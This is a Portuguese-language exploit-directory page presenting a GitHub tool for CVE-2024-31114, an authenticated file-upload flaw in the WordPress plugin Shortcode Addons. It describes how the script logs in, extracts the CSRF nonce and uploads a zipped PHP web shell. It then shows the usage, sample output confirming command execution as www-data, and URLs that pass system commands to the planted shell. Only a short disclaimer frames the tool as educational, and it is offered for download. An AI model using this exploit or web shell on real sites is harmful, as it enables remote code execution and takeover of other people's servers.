Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Autenticado (Admin+) Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-31114
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Autenticado (Admin+) Upload Arbitrário de Arquivos

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-31114 - Exploit RCE no WordPress Shortcode Addons

Shortcode Addons <= 3.2.5 – Upload Arbitrário de Arquivo Autenticado (Admin+)
ID do CVE: CVE-2024-31114
Pontuação CVSS: 9.1 (Crítico)


🛠️ Descrição da Vulnerabilidade

O plugin Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação de tipo de arquivo em todas as versões até e incluindo a 3.2.5.

Essa falha permite que atacantes autenticados com acesso de nível administrador ou superior enviem arquivos arbitrários para o servidor — o que pode levar à Execução Remota de Código (RCE).


🚀 Descrição do Script

Este script em Python automatiza a exploração da vulnerabilidade. Ele realiza:

  1. Desabilitar verificação SSL
  2. Fazer login com as credenciais fornecidas
  3. Extrair o token CSRF (_wpnonce)
  4. Gerar um shell PHP (nxploit.php)
  5. Comprimir e enviar como um .zip
  • Confirmar o upload e acessar o shell
  • Executar whoami no servidor alvo

  • 🧪 Uso

    root@kitploit:~
    usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
    
    Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
    By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            Show this help message and exit
      -u, --url URL         Target URL (e.g. http://target.com)
      -un, --username USERNAME   WordPress Admin Username
      -p, --password PASSWORD    WordPress Admin Password
    

    📤 Exemplo de Saída

    root@kitploit:~
    [+] Authentication successful.
    [+] _wpnonce extracted: 9d8dbbc630
    [+] Payload nxploit.zip created.
    [+] Payload uploaded.
    [+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
    [+] Command output:
    ------------------
    www-data
    ------------------
    [+] Temporary files removed.
    

    🐚 Uso do Web Shell

    Uma vez que o payload é enviado, você pode executar comandos do sistema usando o seguinte formato:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
    

    🔹 Exemplo:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
    

    Isso listará o conteúdo do diretório atual no servidor.

    ⚠️ Aviso Legal

    Esta ferramenta é apenas para fins educacionais e de teste autorizado.
    O autor não se responsabiliza por qualquer uso indevido ou dano causado por este script.

    Use com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.


    Por: Nxploited | Khaled Alenazi

    Baixar ferramenta